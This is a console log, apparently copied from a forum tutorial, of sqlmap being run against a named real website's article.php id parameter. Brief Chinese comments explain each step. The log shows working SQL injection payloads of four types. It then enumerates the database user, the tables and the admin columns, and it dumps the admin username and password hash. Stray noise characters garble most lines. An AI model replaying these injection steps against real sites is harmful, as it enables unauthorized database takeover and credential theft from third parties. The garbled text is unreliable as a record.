D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 \) F5 c5 `6 g5 P9 Qms "Mysql" --current-user /* 注解:获取当前用户名称2 C) `" {9 a; e
sqlmap/0.9 - automatic SQL injection and database takeover tool$ `9 |7 _$ ?/ H
http://sqlmap.sourceforge.net starting at: 16:53:545 U, Z$ H2 j. W/ a! x( l
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
2 ^+ {* L, b9 V) t session file" P, p: D7 W$ f& V' X
[16:53:54] [INFO] resuming injection data from session file
- O) y; u/ E3 R% j3 R- S4 Z+ g+ b[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ p; E K# b# E* U* W: v
[16:53:54] [INFO] testing connection to the target url
5 z) T3 T- ]$ ~ Y C9 xsqlmap identified the following injection points with a total of 0 HTTP(s) reque8 R% M. |$ m R
sts:3 ^% y' l. I/ D+ `) Q. q1 v
---
) @2 |% K+ J' d0 oPlace: GET
& ^) \9 U) H" v. f6 ]( ^6 E5 ~2 bParameter: id& K6 }/ m) C8 I* D5 H3 M
Type: boolean-based blind2 D( k8 s) n- k) L$ q5 B5 @
Title: AND boolean-based blind - WHERE or HAVING clause
$ M$ A0 S7 W. ~: ^+ W, F; v Payload: id=276 AND 799=799! E7 g: b0 w5 Y8 d
Type: error-based
y3 C0 y% U* D3 _) D Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; a2 [2 r" Y! Q- _5 V3 w Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 \; q) C: }, I/ e120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. S4 ^# J( K; N# {& k+ y# V),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! c( t0 }# h- H Type: UNION query, V( s# L4 @% y4 d v
Title: MySQL UNION query (NULL) - 1 to 10 columns
4 F8 v+ P% o% [8 `9 H Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, Z7 u& t& Q' N+ ~! |3 @: V
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
% Q5 K' m- U5 y9 R( h' a$ tCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) g$ T' l' {, q, d' P5 @# H Type: AND/OR time-based blind1 p$ ]9 O! z. V% t0 f/ b
Title: MySQL > 5.0.11 AND time-based blind; c3 T, q9 W1 v4 E* Z0 v8 `
Payload: id=276 AND SLEEP(5)" @: D) I/ Y# Z" K
---* G3 O' ^& m; @$ S3 ^1 l
[16:53:55] [INFO] the back-end DBMS is MySQL
$ L' j' l0 p2 ? Dweb server operating system: Windows
& G6 X* j% I9 i7 k3 Tweb application technology: Apache 2.2.11, PHP 5.3.0
' o8 B1 }6 _% R4 ^back-end DBMS: MySQL 5.0
0 b8 Z5 \* h& `6 [& v" X% @" ?: E[16:53:55] [INFO] fetching current user/ Z, S+ z+ s& s& [: }. l
current user: 'root@localhost' & ^& N* N3 k1 W6 j' R* Z% [
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou2 M, a0 f$ M2 P0 E2 s
tput\www.wepost.com.hk' shutting down at: 16:53:58( B$ W1 `1 H4 Y& M
. f& G; Y1 H- o8 C: m
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# ^7 x3 {. z: ~
ms "Mysql" --current-db /*当前数据库% i% E# u1 s2 o
sqlmap/0.9 - automatic SQL injection and database takeover tool
! ~ L5 W3 G, P' z; ^+ k http://sqlmap.sourceforge.net starting at: 16:54:168 i( D" k% N. l+ D( Y
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as9 ~% f/ P4 i R8 i! b
session file3 e" T' U. m+ U9 W* b' m# ^
[16:54:16] [INFO] resuming injection data from session file Z8 g% ?. N- N" z6 P
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) J% M9 G; [& C/ M$ {
[16:54:16] [INFO] testing connection to the target url
' i) I& |& s0 W) `: msqlmap identified the following injection points with a total of 0 HTTP(s) reque
. a4 E( D2 [+ S G l4 {* msts:
# Q# f7 R, C' M---
9 v5 t5 M, U; [# _/ C/ z' t; S, }$ t3 T4 wPlace: GET# C0 c( D& r2 Q3 |% ~1 Z/ i U, a; p4 a
Parameter: id4 i9 M1 B5 g) t4 r
Type: boolean-based blind. x! e8 e0 c/ o8 w& Q& v1 `. g1 s+ ^
Title: AND boolean-based blind - WHERE or HAVING clause5 y2 A6 S( J- N+ c' x2 ^1 g
Payload: id=276 AND 799=799
2 ]1 O* V- i! P) M2 B Type: error-based0 e+ @! k* ?; b, w K! R: U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 J/ X" z" ]6 j F7 X% z3 R! v. f
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 [9 K( D* @# T0 g4 _
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 `3 b0 a' }3 s! ~: R- o
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); ~, x A2 |( h! B6 h+ b
Type: UNION query
; ^) }& L! U2 d2 v Title: MySQL UNION query (NULL) - 1 to 10 columns
1 }# F+ V8 e. p9 c8 O7 p7 i3 J Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR N2 d; d, c8 x# ]7 U: M
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& z) O0 ]! _ H4 [: `
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ f2 L# o% U- I. L+ t1 r1 p S
Type: AND/OR time-based blind
$ j# l' d: u& v/ P3 b) X" A Title: MySQL > 5.0.11 AND time-based blind# N9 n3 U3 I; W5 o. F7 B
Payload: id=276 AND SLEEP(5)
3 w4 }7 s% Z( y6 S---
+ M5 x D7 l; m$ h- g7 b[16:54:17] [INFO] the back-end DBMS is MySQL+ b m7 w2 c! M' g
web server operating system: Windows2 s R9 K, x- {
web application technology: Apache 2.2.11, PHP 5.3.0
y7 d, D2 {# D9 _back-end DBMS: MySQL 5.08 Y) Y9 q) g7 t0 d+ ]
[16:54:17] [INFO] fetching current database
0 T: V) b' E7 c/ m0 a! t5 x% Xcurrent database: 'wepost'. J9 y9 v/ w/ e
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
, g: F, r. {2 f7 }tput\www.wepost.com.hk' shutting down at: 16:54:185 q! l% M- ], T. x$ @' Q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; F% {7 u4 G3 m: A, X; M$ wms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
! F# J9 T! w% d$ Z sqlmap/0.9 - automatic SQL injection and database takeover tool; ~ V! Z' e& O; H4 p
http://sqlmap.sourceforge.net starting at: 16:55:25
: T! Y' V$ J7 Q( G9 d3 E[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% r4 X9 k- x' P$ ~& U+ ^! m. Q! [ | session file' M, W7 Y* Z& s+ A5 c
[16:55:25] [INFO] resuming injection data from session file
! g8 L) I- o, v[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
' P) L- Y3 ]+ ][16:55:25] [INFO] testing connection to the target url$ g% C5 h: S/ C8 u! ^7 P0 R
sqlmap identified the following injection points with a total of 0 HTTP(s) reque& g7 ?, J4 p, v# Y1 o& P
sts:
) p* t8 Z* m: I6 x) q) p---
$ M9 d- o( H+ Y$ U# N3 v; k. S* a4 _2 IPlace: GET
: C/ j H1 @- m2 n% UParameter: id
7 W5 [! s7 b/ g5 D7 H3 g( u6 \ Type: boolean-based blind, X: ~; w- ]9 p+ Q* J
Title: AND boolean-based blind - WHERE or HAVING clause
?3 k& g( G' @* l- K Payload: id=276 AND 799=799
1 I3 S& S% E/ m' ] Type: error-based
/ [# U* d5 j9 g1 N Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, z7 `4 Q3 v# U* L. y) ] Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
, h: s' H1 y H, d6 n- ^ |& [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! U* M$ R- [( y7 c. T- {
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
. z# y2 V- ^; r* F. a; Q Type: UNION query
0 y8 q% f, w0 w8 L3 `. v. j Title: MySQL UNION query (NULL) - 1 to 10 columns
N: @3 a, W8 U Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 \5 [5 ?0 A* O) L% o
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; J" H! ?$ e+ ^- d, R' d8 sCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 o/ D# W7 T$ k {, V% B Type: AND/OR time-based blind; l7 m# i% e: C! p5 S
Title: MySQL > 5.0.11 AND time-based blind: T. y6 V2 X# q+ |2 @" o8 x
Payload: id=276 AND SLEEP(5)& F5 b6 s( F! a5 s# _8 k3 l
---5 O; c3 h3 ]8 q( a
[16:55:26] [INFO] the back-end DBMS is MySQL: W8 _" i) z" L1 R. t
web server operating system: Windows5 ^. x7 C$ h! U
web application technology: Apache 2.2.11, PHP 5.3.0! V# Y% D# Q) R2 S/ a1 t4 d3 n# x
back-end DBMS: MySQL 5.03 ~( o6 _8 P2 Q* l
[16:55:26] [INFO] fetching tables for database 'wepost'
# G; N1 s3 k3 c9 P0 [[16:55:27] [INFO] the SQL query used returns 6 entries
2 _6 t: [# X# }/ ^9 r" W* w8 Q3 aDatabase: wepost
* n0 Y5 @. D' K O[6 tables]
: g0 C }; R& h7 x' D' d* m. S+-------------+) k3 A4 A$ j4 s; K/ `9 n8 Y
| admin |6 q5 ~9 s5 o$ Q8 q, ]+ F+ d; K
| article |
/ M- F6 K7 V' e% |! g| contributor |
+ r* N9 S$ ?9 J+ c| idea |; ~) p4 d$ D: Q6 S! L# O
| image |9 V7 d. M" `, p+ r6 B
| issue |
% s w0 S8 g O( a* S& z+-------------+* U! s: L4 v* b$ |* [& i# c
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ r+ B- d5 ?# C, y1 A, j* e3 E
tput\www.wepost.com.hk' shutting down at: 16:55:33
0 r- h/ O& a" M) b3 j6 K9 p) M# N6 Y5 j6 e
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# ?. G5 @% d2 G( C% E( w v1 Vms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名2 v$ t6 v; q- f$ d
sqlmap/0.9 - automatic SQL injection and database takeover tool
9 j* \5 l& _/ T8 ?6 @ http://sqlmap.sourceforge.net starting at: 16:56:06
0 o) w5 a# _! s/ T1 O3 jsqlmap identified the following injection points with a total of 0 HTTP(s) reque2 Q$ p/ D. z/ M5 H% e f7 F
sts:
- S. _0 G; H- }6 W& T---; n( ^/ ^" U$ P3 T
Place: GET
( N* \3 j, g, F9 p- W2 ^* k0 Q2 vParameter: id$ w/ z' P' ?% c/ R' J, ]' U
Type: boolean-based blind' G* p$ ]7 O: P" y3 r
Title: AND boolean-based blind - WHERE or HAVING clause8 w1 P6 y7 |# [0 d! A9 W/ b
Payload: id=276 AND 799=799, h2 ^1 \) G7 F: h+ Z" ~3 B
Type: error-based: t. h% s2 i. a8 ^
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 ~" `7 O! k$ Z- D, e+ z2 d
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 N N9 {; D5 z6 R120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; A2 u- Z9 X# W! h n' D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
5 }( C# B0 t* G7 b4 ~# m. x Type: UNION query5 u9 J8 \7 [: A9 i( t
Title: MySQL UNION query (NULL) - 1 to 10 columns, q4 q) n: `4 I5 O: [' U
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( T/ B' m' e8 e/ b(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) c) g( b( X, s9 @" V
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ G# @6 f4 X+ g; a- \1 x: _& f
Type: AND/OR time-based blind: T7 L' t6 {+ X4 p; q5 o5 U' Z
Title: MySQL > 5.0.11 AND time-based blind
( s0 q0 o1 W/ o4 o& b. q Payload: id=276 AND SLEEP(5)5 ^4 [9 w! k: e$ A2 c3 a8 s
---+ M7 R P/ z6 w' A" O. K. L
web server operating system: Windows- Z- {7 j0 i4 E1 _- _6 h
web application technology: Apache 2.2.11, PHP 5.3.0" a" C8 h3 k( a: p& Q2 Y
back-end DBMS: MySQL 5.0
* r" ?. X: I8 v% R7 Q2 K9 W: F[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
# t7 e9 `, _7 \ssion': wepost, wepost
7 I* U& C! X. }; q8 BDatabase: wepost/ I9 W* I V! R/ x
Table: admin
" D/ [0 C3 A% b6 d0 `5 }[4 columns]* O0 l: O: Q6 i& e
+----------+-------------+
9 @) R) P* o* b: q' C: Z| Column | Type |7 a. g0 F O! Z0 v
+----------+-------------+
- r: v2 }' v1 O| id | int(11) |
, }; I- A5 E. h" _/ q5 w| password | varchar(32) |
( i4 e; T) R0 {: L* p| type | varchar(10) |8 V; q5 {. z, |" [# N) Z
| userid | varchar(20) |
+ @) L9 K _) S9 z7 l1 c" N; M/ `+----------+-------------+
' _9 N9 @' ?0 b& ]8 \ shutting down at: 16:56:195 ?0 ~+ W9 m1 R! v+ G2 F4 D
. c: o- I; F' T5 K
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 ~8 X* E: M* \6 c- t7 O) d f- ]
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容& R. P m4 m9 x7 K+ H" }
sqlmap/0.9 - automatic SQL injection and database takeover tool
' |9 r9 f- @( N; ]6 w2 A* c http://sqlmap.sourceforge.net starting at: 16:57:14! w$ ?7 }6 s+ ~$ Y6 d+ k! n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque7 o6 a5 t( v, ?8 K
sts:. f2 {* ^8 ] Z! }, H5 N, S
---
3 }3 X' {% y0 T3 [. V4 UPlace: GET: _$ e8 f' Z. C* @+ [' i @/ P
Parameter: id
4 \' i' f7 N, c' @+ e Type: boolean-based blind5 b5 v9 e. U" X; O) A/ i1 B: O
Title: AND boolean-based blind - WHERE or HAVING clause) H. v0 S. h% u" q
Payload: id=276 AND 799=799
3 }# i+ N$ {0 Y$ L& r6 N$ d/ k Type: error-based
3 @" f4 d6 `- T% Z1 @0 w9 L Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" g Z8 `1 D+ X4 A; [# K% H
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- o5 ^! ?$ B9 J+ m' H- y2 Y7 z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 |- j+ D m3 y) j, T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 ^ T/ c0 |* F" l# |
Type: UNION query
0 i% V+ l4 T& w0 @- q% f. B& P% a Title: MySQL UNION query (NULL) - 1 to 10 columns
' m8 M# f, _$ K; ?$ Z8 n6 C, U. ] Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 f; Z( R; Y2 [2 P$ a7 g" A, r
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ d+ j7 i2 U1 z( ^2 |. qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. O8 l0 n) x1 L7 }% N
Type: AND/OR time-based blind
j3 F6 m G9 e4 a/ y- _ Title: MySQL > 5.0.11 AND time-based blind1 O8 m% [# S, _2 Y. C3 d
Payload: id=276 AND SLEEP(5)
6 o) z5 n+ j& K. q4 e( t) N---; S# ]2 O& o3 T4 s
web server operating system: Windows6 B* H/ T3 i( O# I: L
web application technology: Apache 2.2.11, PHP 5.3.0
" f4 e0 X R* t! q, d; E* oback-end DBMS: MySQL 5.0% V* J5 t9 `) t+ w$ ?2 [4 {7 R
recognized possible password hash values. do you want to use dictionary attack o
4 }% X+ r5 J% H% a* R, nn retrieved table items? [Y/n/q] y
, O2 w9 R3 j0 z( i% G, a& wwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]: O, D' e d6 l& G/ c p( @
do you want to use common password suffixes? (slow!) [y/N] y
* N; m$ \5 Z5 V- T* W$ N1 mDatabase: wepost( V O8 m; [: @
Table: admin* f6 s0 |# x1 m
[1 entry]+ X& G3 t2 v) O7 r
+----------------------------------+------------+4 x, v5 r- d, F) R: w) J& P
| password | userid |
6 b5 u+ M+ O/ w, a( k) [' I" m+----------------------------------+------------+1 `) ^9 D( r6 |9 X
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
. d) v: b2 f- q9 f+----------------------------------+------------+
~5 k: K l( ~3 s shutting down at: 16:58:14" ?; Y& N/ l: R" L( H# u/ i; u
5 O$ S0 I5 t. P( P: S+ l( B
D:\Python27\sqlmap> |